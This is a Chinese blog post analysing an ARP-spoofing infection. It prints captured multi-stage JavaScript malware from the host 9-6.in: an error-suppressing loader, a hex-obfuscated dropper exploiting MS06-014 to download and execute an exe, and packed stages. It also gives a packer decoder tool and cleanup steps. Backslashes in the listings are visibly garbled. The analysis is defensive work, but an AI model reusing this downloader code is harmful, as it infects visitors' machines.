

解析arp病毒背后利用的Javascript技術附解密方法

本文的目的是探討JS相關技術,并不是以殺毒為主要目的,殺毒只是為講解一些JS做鋪墊的,呵呵,文章有點長,倒杯咖啡或者清茶慢慢看,學習切勿急躁!

最近公司的網絡中了這兩天鬧的很歡的ARP病毒,導致大家都無法上網,給工作帶來了很大的不方便,在這里寫下殺毒的過程,希望對大家能有幫助!

現象:打開部分網頁顯示為亂碼,好像是隨機的行為,但是看似又不是,因為它一直在監視msn.com,呵呵,可能和微軟有仇吧,繼續查看源代碼,發現頭部有一個js文件鏈接----<script src=http://9-6.in/n.js></script>;

來源:經過一番網絡搜索,發現這個域名是印度域名,而IP地址卻是美國的,而且域名的注冊日期是7月25日,看來一切都是預謀好了的,還是不管這個了,先解決問題吧;

分析:
1、先把(http://9-6.in/n.js)這個JS文件下載下來,代碼如下: 

    // First-stage loader (n.js) exactly as the post captured it. NOTE(review):
    // the listing is extraction-garbled -- every backslash became "/" (so `/"`
    // was `\"` and `<//script>` was `<\/script>`); it is quoted for analysis,
    // not as runnable code.
    // Swallow every script error so the loader fails silently wherever a later
    // stage is blocked or broken.
    document.writeln("<script>window.onerror=function(){return true;}<//script>");
    // Second stage: the hex-obfuscated dropper NewJs2.js from the same host.
    document.writeln("<script src=/"http:////9-6.in//S368//NewJs2.js/"><//script>");
    document.writeln("<script>");
    // StartRun(): marks the visitor with a one-day "Cookie1" cookie and, on the
    // first visit only, injects a 0x0 hidden iframe that loads T368.htm (the
    // packed third stage). Repeat visits do nothing.
    document.writeln("function StartRun(){");
    document.writeln("var Then = new Date() ");
    document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
    document.writeln("var cookieString = new String(document.cookie)");
    document.writeln("var cookieHeader = /"Cookie1=/" ");
    document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
    document.writeln("if (beginPosition != -1){ ");
    document.writeln("} else ");
    document.writeln("{ document.cookie = /"Cookie1=POPWINDOS;expires=/"+ Then.toGMTString() ");
    document.writeln("document.write(/'<iframe width=0 height=0 src=/"http:////9-6.IN//s368//T368.htm/"><//iframe>/');");
    document.writeln("}");
    document.writeln("}");
    document.writeln("StartRun();");
    // Defensive takeaway: the observable artefact is a foreign <script src=...>
    // injected into otherwise unrelated pages (the post attributes this to ARP
    // spoofing on the LAN) -- worth matching in proxy logs and page sources.
    document.writeln("<//script>")
其中第一句window.onerror=function(){return true;}就先把JS錯誤屏蔽掉,真夠狠的,呵呵,不這樣怎么隱藏自己呢,哈哈!然后還有個JS文件http://9-6.in/S368/NewJs2.js,先繼續往下看,找到StartRun();運行一個函數,函數的主要作用是寫COOKIE,日期為保存一天,然后還用隱藏框架加載了一個文件(http://9-6.IN/s368/T368.htm),其余就沒有什么特別的了;
2、下載(http://9-6.in/S368/NewJs2.js)這個文件,代碼如下:

// Second stage (NewJs2.js) as captured. The whole script is a single string
// built from hex escapes; as the post explains, it is encoded twice (the inner
// "http:///x78..." runs decode to a further layer of \x escapes). NOTE(review):
// the page extraction flattened backslashes to "/" and turned some `\\` runs
// into "http://", so `/x3c` below was `\x3c`; the text is not runnable as shown.
// What it decodes to is the "core code" excerpt the post gives further down.
StrInfo =  "/x3c/x73/x63/x72/x69/x70/x74/x3e/x77/x69/x6e/x64/x6f/x77/x2e/x6f/x6e/x65/x72/x72/x6f/x72/x3d/x66/x75/x6e/x63/x74/x69/x6f/x6e/x28/x29/x7b/x72/x65/x74/x75/x72/x6e /x74/x72/x75/x65/x3b/x7d/x3c/x2f/x73/x63/x72/x69/x70/x74/x3e" +"/n"+
  "/x3c/x73/x63/x72/x69/x70/x74/x3e" +"/n"+
  " /x44/x5a/x3d/'///x78/x36/x38///x78/x37/x34///x78/x37/x34///x78/x37/x30///x78/x33/x41///x78/x32/x46///x78/x32/x46///x78/x33/x39///x78/x32/x44///x78/x33/x36///x78/x32/x45///x78/x36/x39///x78/x36/x45///x78/x32/x46///x78/x35/x33///x78/x33/x33///x78/x33/x36///x78/x33/x38///x78/x32/x46///x78/x35/x33///x78/x33/x33///x78/x33/x36///x78/x33/x38///x78/x32/x45///x78/x36/x35///x78/x37/x38///x78/x36/x35/'/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x66/x75/x6e/x63/x74/x69/x6f/x6e /x47/x6e/x4d/x73/x28/x6e/x29 " +"/n"+
  "/x7b " +"/n"+
  " /x76/x61/x72 /x6e/x75/x6d/x62/x65/x72/x4d/x73 /x3d /x4d/x61/x74/x68/x2e/x72/x61/x6e/x64/x6f/x6d/x28/x29/x2a/x6e/x3b" +"/n"+
  " /x72/x65/x74/x75/x72/x6e /'///x78/x37/x45///x78/x35/x34///x78/x36/x35///x78/x36/x44///x78/x37/x30/'/x2b/x4d/x61/x74/x68/x2e/x72/x6f/x75/x6e/x64/x28/x6e/x75/x6d/x62/x65/x72/x4d/x73/x29/x2b/'///x78/x32/x45///x78/x37/x34///x78/x36/x44///x78/x37/x30/'/x3b" +"/n"+
  "/x7d " +"/n"+
  " /x74/x72/x79 " +"/n"+
  "/x7b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  // The next four lines are the ones the post's "core code" excerpt shows decoded:
  // createElement("object") with the MDAC classid, then Microsoft.XMLHTTP and
  // ADODB.Stream obtained through it.
  " /x76/x61/x72 /x42/x66/x3d/x64/x6f/x63/x75/x6d/x65/x6e/x74/x2e/x63/x72/x65/x61/x74/x65/x45/x6c/x65/x6d/x65/x6e/x74/x28/"http:///x78/x36/x46///x78/x36/x32///x78/x36/x41///x78/x36/x35///x78/x36/x33///x78/x37/x34/"/x29/x3b" +"/n"+
  " /x42/x66/x2e/x73/x65/x74/x41/x74/x74/x72/x69/x62/x75/x74/x65/x28/"http:///x78/x36/x33///x78/x36/x43///x78/x36/x31///x78/x37/x33///x78/x37/x33///x78/x36/x39///x78/x36/x34/"/x2c/"http:///x78/x36/x33///x78/x36/x43///x78/x37/x33///x78/x36/x39///x78/x36/x34///x78/x33/x41///x78/x34/x32///x78/x34/x34///x78/x33/x39///x78/x33/x36///x78/x34/x33///x78/x33/x35///x78/x33/x35///x78/x33/x36///x78/x32/x44///x78/x33/x36///x78/x33/x35///x78/x34/x31///x78/x33/x33///x78/x32/x44///x78/x33/x31///x78/x33/x31///x78/x34/x34///x78/x33/x30///x78/x32/x44///x78/x33/x39///x78/x33/x38///x78/x33/x33///x78/x34/x31///x78/x32/x44///x78/x33/x30///x78/x33/x30///x78/x34/x33///x78/x33/x30///x78/x33/x34///x78/x34/x36///x78/x34/x33///x78/x33/x32///x78/x33/x39///x78/x34/x35///x78/x33/x33///x78/x33/x36/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x4b/x78/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"http:///x78/x34/x44///x78/x36/x39///x78/x36/x33///x78/x37/x32///x78/x36/x46///x78/x37/x33///x78/x36/x46///x78/x36/x36///x78/x37/x34///x78/x32/x45///x78/x35/x38/"/x2b/"http:///x78/x34/x44///x78/x34/x43///x78/x34/x38///x78/x35/x34///x78/x35/x34///x78/x35/x30/"/x2c/"/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x41/x53/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"http:///x78/x34/x31///x78/x36/x34///x78/x36/x46///x78/x36/x34///x78/x36/x32///x78/x32/x45///x78/x35/x33///x78/x37/x34///x78/x37/x32///x78/x36/x35///x78/x36/x31///x78/x36/x44/"/x2c/"/"/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x41/x53/x2e/x74/x79/x70/x65/x3d/x31/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4b/x78/x2e/x6f/x70/x65/x6e/x28/"http:///x78/x34/x37///x78/x34/x35///x78/x35/x34/"/x2c /x44/x5a/x2c/x30/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4b/x78/x2e/x73/x65/x6e/x64/x28/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4e/x73/x31/x3d/x47/x6e/x4d/x73/x28/x39/x39/x39/x39/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  // Remaining decoded lines from the post's excerpt: Scripting.FileSystemObject,
  // the temp folder, SaveToFile, then Shell.Application running cmd.exe /c on
  // the dropped file.
  " /x76/x61/x72 /x63/x46/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"http:///x78/x35/x33///x78/x36/x33///x78/x37/x32///x78/x36/x39///x78/x37/x30///x78/x37/x34///x78/x36/x39///x78/x36/x45///x78/x36/x37///x78/x32/x45///x78/x34/x36///x78/x36/x39///x78/x36/x43///x78/x36/x35///x78/x35/x33///x78/x37/x39///x78/x37/x33///x78/x37/x34///x78/x36/x35///x78/x36/x44///x78/x34/x46///x78/x36/x32///x78/x36/x41///x78/x36/x35///x78/x36/x33///x78/x37/x34/"/x2c/"/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x4e/x73/x54/x6d/x70/x3d/x63/x46/x2e/x47/x65/x74/x53/x70/x65/x63/x69/x61/x6c/x46/x6f/x6c/x64/x65/x72/x28/x30/x29/x3b /x4e/x73/x31/x3d /x63/x46/x2e/x42/x75/x69/x6c/x64/x50/x61/x74/x68/x28/x4e/x73/x54/x6d/x70/x2c/x4e/x73/x31/x29/x3b /x41/x53/x2e/x4f/x70/x65/x6e/x28/x29/x3b/x41/x53/x2e/x57/x72/x69/x74/x65/x28/x4b/x78/x2e/x72/x65/x73/x70/x6f/x6e/x73/x65/x42/x6f/x64/x79/x29/x3b" +"/n"+
  " /x41/x53/x2e/x53/x61/x76/x65/x54/x6f/x46/x69/x6c/x65/x28/x4e/x73/x31/x2c/x32/x29/x3b /x41/x53/x2e/x43/x6c/x6f/x73/x65/x28/x29/x3b /x76/x61/x72 /x71/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"http:///x78/x35/x33///x78/x36/x38///x78/x36/x35///x78/x36/x43///x78/x36/x43///x78/x32/x45///x78/x34/x31///x78/x37/x30///x78/x37/x30///x78/x36/x43///x78/x36/x39///x78/x36/x33///x78/x36/x31///x78/x37/x34///x78/x36/x39///x78/x36/x46///x78/x36/x45/"/x2c/"/"/x29/x3b" +"/n"+
  " /x6f/x6b/x31/x3d/x63/x46/x2e/x42/x75/x69/x6c/x64/x50/x61/x74/x68/x28/x4e/x73/x54/x6d/x70/x2b/'///x78/x35/x43///x78/x35/x43///x78/x37/x33///x78/x37/x39///x78/x37/x33///x78/x37/x34///x78/x36/x35///x78/x36/x44///x78/x33/x33///x78/x33/x32/'/x2c/'///x78/x36/x33///x78/x36/x44///x78/x36/x34///x78/x32/x45///x78/x36/x35///x78/x37/x38///x78/x36/x35/'/x29/x3b" +"/n"+
  " /x71/x2e/x53/x48/x65/x4c/x4c/x45/x78/x65/x63/x75/x74/x65/x28/x6f/x6b/x31/x2c/'///x78/x32/x30///x78/x32/x46///x78/x36/x33 /'/x2b/x4e/x73/x31/x2c/"/"/x2c/"http:///x78/x36/x46///x78/x37/x30///x78/x36/x35///x78/x36/x45/"/x2c/x30/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x7d " +"/n"+
  " /x63/x61/x74/x63/x68/x28/x4d/x73/x49/x29 /x7b /x4d/x73/x49/x3d/x31/x3b /x7d" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x3c/x2f/x73/x63/x72/x69/x70/x74/x3e"
// The two hex keys spell "document" and "write": this is plain
// document.write(StrInfo), written as a property lookup so the call does not
// appear in the source as text.
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"](StrInfo);
這個代碼有點長哦,而且有保護措施,全部轉換為十六進制,不過不要害怕,我們有辦法解決,首先得確保你已經安裝了UE,然后打開UE,把代碼粘貼進去(廢話,呵呵),把/x替換為%,然后用html代碼轉換功能,解碼,就可以得到第一次解碼的代碼,第一次???,呵呵,這個代碼的作者很變態的,做了兩次編碼,所以我得進行兩次解碼才行,重復剛才的步驟,然后你就可以看到最終的“原始”代碼了;
具體的代碼我就不貼出來了,有一定的危害性,相信大家看了上面的步驟都能自己找到代碼,這里只說一下比較核心的代碼吧;

//核心代碼
..............
  " var Bf=document.createElement(/"/o/b/j/e/c/t/");" +"/n"+
  " Bf.setAttribute(/"/c/l/a/s/s/i/d/",/"/c/l/s/i/d/:/B/D/9/6/C/5/5/6/-/6/5/A/3/-/1/1/D/0/-/9/8/3/A/-/0/0/C/0/4/F/C/2/9/E/3/6/");" +"/n"+
  " var Kx=Bf.CreateObject(/"/M/i/c/r/o/s/o/f/t/./X/"+/"/M/L/H/T/T/P/",/"/");" +"/n"+
  " var AS=Bf.CreateObject(/"/A/d/o/d/b/./S/t/r/e/a/m/",/"/");" +"/n"+
.............
  " var cF=Bf.CreateObject(/"/S/c/r/i/p/t/i/n/g/./F/i/l/e/S/y/s/t/e/m/O/b/j/e/c/t/",/"/");" +"/n"+
  " var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +"/n"+
  " AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject(/"/S/h/e/l/l/./A/p/p/l/i/c/a/t/i/o/n/",/"/");" +"/n"+
  " ok1=cF.BuildPath(NsTmp+/'/////s/y/s/t/e/m/3/2/',/'/c/m/d/./e/x/e/');" +"/n"+
  " q.SHeLLExecute(ok1,/'/ ///c /'+Ns1,/"/",/"/o/p/e/n/",0);" +"/n"+
..............
上面的就是最為核心的代碼,利用MS06-014漏洞、創建JS異步對象獲取病毒(*.exe)文件,然后運行,這樣就達到它的目的啦!
3、打開http://9-6.IN/s368/T368.htm查看源代碼,又發現一段怪異的JS文件,如下:

<script>
    // T368.htm as captured: the widely used packer format with the
    // eval(function(p,a,c,k,e,d){...}) signature, wrapped around a hex-escaped
    // string. The decoder the post gives below unpacks it to a one-line loader
    // for "S368.jpg" -- a script served under an image extension.
    // As elsewhere on this page, backslashes were flattened to "/" by the
    // extraction (`//w+` was `\\w+`), so the text is not runnable as shown.
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('x("http://0//6//9//5//i//h//j//j//4//f//8//3//2//0//7//1//i//8//2//3//h//g//4//w//v//u//t//b//s//7//r//g//4//e//f//q//8//3//2//0//7//1//e//4//d//c//d//c//p//5//3//o//n//a//6//1//b//m//2//0//1//a//l//0//6//9//5//k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123|eval'.split('|'),0,{}))
</script>





可以看出這段代碼也是經過加密的了,特征為function(p,a,c,k,e,d),這種加密方法網上有很多例子,我就不細說了,附上解密代碼:

//以下代碼為網上搜索所得,版權歸原作者所有
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>無標題文檔</title>
</head>
<body>
<script>
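// Radix of the identifier tokens: 0-9, a-z, A-Z give 62 symbols.
// Declared with `var` (still a script-level global for num() and the inline
// onclick handlers) instead of the implicit global the original relied on.
var a = 62;

/**
 * Packs the script in the #code textarea into the
 * eval(function(p,a,c,k,e,d){...}) form: every word is replaced by a short
 * base-62 token and the sorted word list is appended so the unpacker can
 * reverse the substitution. The result replaces the textarea's value.
 *
 * Reconstruction note: the listing this page carries lost its closing braces
 * and had every backslash flattened to "/"; the regexes and escapes below are
 * restored to the form the surrounding code requires (\r\n, \', \b, \w).
 */
function encode() {
  var box = document.getElementById('code');
  var code = box.value;
  // The payload must fit in one '...' literal: drop line breaks and escape quotes.
  code = code.replace(/[\r\n]+/g, '');
  code = code.replace(/'/g, "\\'");
  // Sorted, de-duplicated word list; a word's index becomes its token.
  // `|| []` keeps an input with no words from crashing on .sort().
  var tmp = code.match(/\b(\w+)\b/g) || [];
  tmp.sort();
  var dict = [];
  var i;
  var t = '';
  for (i = 0; i < tmp.length; i++) {
    if (tmp[i] !== t) dict.push(t = tmp[i]);
  }
  var len = dict.length;
  var ch;
  for (i = 0; i < len; i++) {
    ch = num(i);
    code = code.replace(new RegExp('\\b' + dict[i] + '\\b', 'g'), ch);
    // A word that equals its own token needs no dictionary entry; the
    // unpacker's `k[c]||e(c)` falls back to the token itself.
    if (ch === dict[i]) dict[i] = '';
  }
  box.value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}("
    + "'" + code + "'," + a + "," + len + ",'" + dict.join('|') + "'.split('|'),0,{}))";
}

/**
 * Base-62 token for index c: digits 0-9 and a-z come from toString(36),
 * values 36..61 map to 'A'..'Z' (code 65 = 36 + 29). Mirrors the e() helper
 * embedded in the packed output so both sides agree on the numbering.
 * @param {number} c - non-negative word index
 * @returns {string} the token
 */
function num(c) {
  // Math.floor matches parseInt(c/a) for the non-negative indices used here.
  return (c < a ? '' : num(Math.floor(c / a))) +
    ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
}

/**
 * Executes whatever is in the textarea in this page's origin.
 * NOTE(review): this is arbitrary code execution by design; with a captured
 * sample pasted in it runs the malware, so use decode() and read the output
 * instead, on an isolated machine.
 */
function run() {
  eval(document.getElementById('code').value);
}

/**
 * Unpacks an eval(function(p,a,c,k,e,d){...}(...)) expression: strips the
 * leading "eval" and evaluates the remaining call, which returns the unpacked
 * source as a string without executing it. The string replaces the textarea.
 * NOTE(review): if the pasted text is not a packer expression, eval() simply
 * runs it -- the same caveat as run() applies.
 */
function decode() {
  var code = document.getElementById('code').value;
  code = code.replace(/^eval/, '');
  document.getElementById('code').value = eval(code);
}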
</script> 
<textarea id=code cols=80 rows=20> 

</textarea><br /> 
<input type=button onclick=encode() value=編碼/> 
<input type=button onclick=run() value=執行/> 
<input type=button onclick=decode() value=解碼/>
</body>
</html>
經過解密后代碼為:

// Unpacked T368.htm (output of the decoder above): a one-line loader for the
// next stage, which is served under an image extension (.jpg) but fetched as a
// script. Backslashes in the listing were flattened to "/" by the extraction.
info =        "<script src=/"S368.jpg/"></script>"
document.write(info)
繼續打開這個表面象圖片的鏈接,呵呵,當然不會是MM圖片了,查看源代碼,找到如下代碼:

// S368.jpg as captured: the same packer format (here function(p,a,c,k,e,r))
// over a hex-escaped payload; the post reports it decodes to a second download
// route that drives the Web Thunder (Xunlei) download manager to fetch and run
// the binary. The word list at the end already shows ActiveXObject, try, new,
// catch and var before any unpacking. The literal is line-wrapped by the page
// extraction (a string cannot span raw newlines) and backslashes were
// flattened to "/", so it is not runnable as shown.
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f("http://K//l//r//8//i//3//6//j//3//6//o//3//6//9//C//3//s//K//l//r//8//i//3//6//9//x")}1g(e){Q}E a=n["http://15//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://R//7//q//3//v//5//4//l","");1h(a["http://7//8//i//3//y//L//m"]("http://z//f//l//4//5//9//3//y//3")!=-1){Q}E b=n["http://15//3//4//j//3//6//o//3//6//v//5//4//l"]();b=b["http://f//r//s//f//4//6"](0,2);b+="http://////v//6//d//k//6//5//J//x//////K//l//r//8//i//3//J//x//////1i//3//s//K//l//r//8//i//3//6//////A//6//d//m//7//q//3//f//////r//f//3//6//h//d//8//m//7//k//9//7//8//7";n["http://j//3//4//p//5//q//q//s//5//h//1j//F//8//4//6//D"](1k,13);E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://7");E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://5");E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://s");E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://h");E c=n["http://w//i//i//p//5//4//3//k//d//6//D"]("http://i");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://7","http://S//f//h//6//7//A//4//16//o//5//6 //f//G//8//3//C //w//h//4//7//o//3//N//L//s//T//3//h//4//t//"http://C//f//h//6//7//A//4//9//f//l//3//q//q//"http://u//g//o//5//6 //d//G//8//3//C //w//h//4//7//o//3//N//L//s//T//3//h//4//t//"http://f//l//3//q//q//9//5//A//A//q//7//h//5//4//7//d//8//"http://u//g//o//5//6 //5//B//s//B//h//B//i//B//3//B//m//B//k//g");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://5","http://H//g//f//9//U//r//8//t//"http://p//V//////////v//6//d//k//6//5//J//x//////////I//8//4//3//6//8//J//x//////////I//F//N//v//17//L//U//F//9//F//N//F 
//l//4//4//A//1l//O//O//h//1m//x//W//7//18//O//j//X//19//1a//O//i//1n//C//18//Y//Y//W//l//4//Y//1o//"http://B//H//B//H//u//g//f//9//U//r//8//t//"http://h//z//i//9//3//y//3 //Z//h //4//6//3//3 //h//V//////// //Z//m//"http://B//H//B//x//u//g");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://s","http://f//9//j//A//3//h//7//5//q//R//d//q//i//3//6//f//t//"http://1p//D//1q//d//h//r//z//3//8//4//f//"http://u//g//s//G//s//9//f//r//s//f//4//6//7//8//k//t//H//B//s//9//q//5//f//4//I//8//i//3//y//L//m//t//"http://////////"http://u//u//g//s//P//G//"http://////////q//d//h//5//q//f//J//x//////////K//3//z//A//d//6//J//x//////////p//d//8//4//3//8//4//9//I//F//1r//////////"http://g");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://h","http://d//9//1s//5//z//3//j//A//5//h//3//t//s//u//g//m//d//6//t//5//G//H//g//5//S//h//9//I//4//3//z//f//t//u//9//p//d//r//8//4//g//5//P//P//u//10 //o//5//6 //m//G//h//9//I//4//3//z//f//t//u//9//I//4//3//z//t//5//u//9//v//5//4//l//g//m//P//G//"http://////////j//X//19//1a//1b//1t//x//1u//W//3//y//3//"http://g");n["http://j//3//4//p//d//8//m//7//k"]("http://j//5//o//3//v//5//4//l","http://i","http://H//g//4//6//D//10//f//9//F//y//3//h//t//m//u//g//11//h//5//4//h//l//t//3//u//10//11//g//11//C//7//8//i//d//C//9//h//q//d//f//3//t//u//g//S//Z//f//h//6//7//A//4//16");n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://v//6//d//4//3//h//4","http://x");n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://R//7//q//3//v//5//4//l","http://h//V//////C//7//8//i//d//C//f//////f//D//f//4//3//z//X//1b//////z//f//l//4//5//9//3//y//3");n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://v//5//6//5//z//3//4//3//6",b);n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://F//y//4//17//7//f//4","http://9//6//5//6//g//9//M//7//A//g//9//3//y//3//g//9//i//d//h//g//9//h//d//z//g//9//s//7//8//g//9//k//M//g//9//M
//g//9//4//5//6//g//9//5//6//T//g//9//q//M//l//g//9//f//7//4//g//9//l//1v//y//g//9//4//k//M//g//9//i//q//q//g//9//d//h//y//g//9//o//s//y//g");n["http://j//3//4//p//d//8//m//7//k"]("http://w//8//4//7//o//7//6//r//f","http://1w//f//3//6//j//3//4","http://x");Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))
又是好長的代碼,又發現了function(p,a,c,k,e,r),繼續解碼,代碼很長,請大家自己解碼查看吧,這里應用的還是上面的手法,用加密函數加密,然后轉換為十六進制,盡最大努力混淆我們的視線,來達到不可告人的目的,這里的代碼的主要作用是用另外一種方法下載病毒并運行,思想真的很先進,居然是去調用Web迅雷來下載病毒,然后去運行,作者真的是煞費苦心啊,應用了兩種方法下載病毒,“小樣,就不信毒不倒你!”,呵呵
殺毒:說了半天只是分析了一下ARP病毒發作的時候在干什么,下面就說下關于殺毒的問題,其實現在網上有很多這方面的相關教程,我就簡單總結一下我的殺毒過程吧;
1、中了arp病毒必須要先找到中毒的機器
2、給這個機器斷網、殺毒
3、恢復局域網
其中第一步最關鍵了,如何才能找到呢?
在局域網隨便一臺客戶機上打開網上鄰居,查看工作組計算機,然后等到列表刷新出來后,迅速點擊開始-->運行-->cmd-->arp -a回車,如果機器比較多,請多輸入幾次arp -a,然后仔細查看,你會發現有一臺機器的Mac地址和網關的Mac地址相同,恭喜你,這就是那個毒源!
到這臺機器的跟前(呵呵,廢話真多),剩下的工作相信大家都有很多經驗了吧,殺毒!裝殺毒軟件或者進安全模式更甚者重裝機器,總之把病毒干掉就行了;
最后,到不能打開網頁的機器上執行這個命令:點擊開始-->運行-->cmd-->arp -d回車,然后就可以了。

終于一切又恢復了平靜,是不是很有成就感呢,呵呵!

本人的第一篇正式的BLOG技術文章終于寫完了,希望大家能喜歡看!  


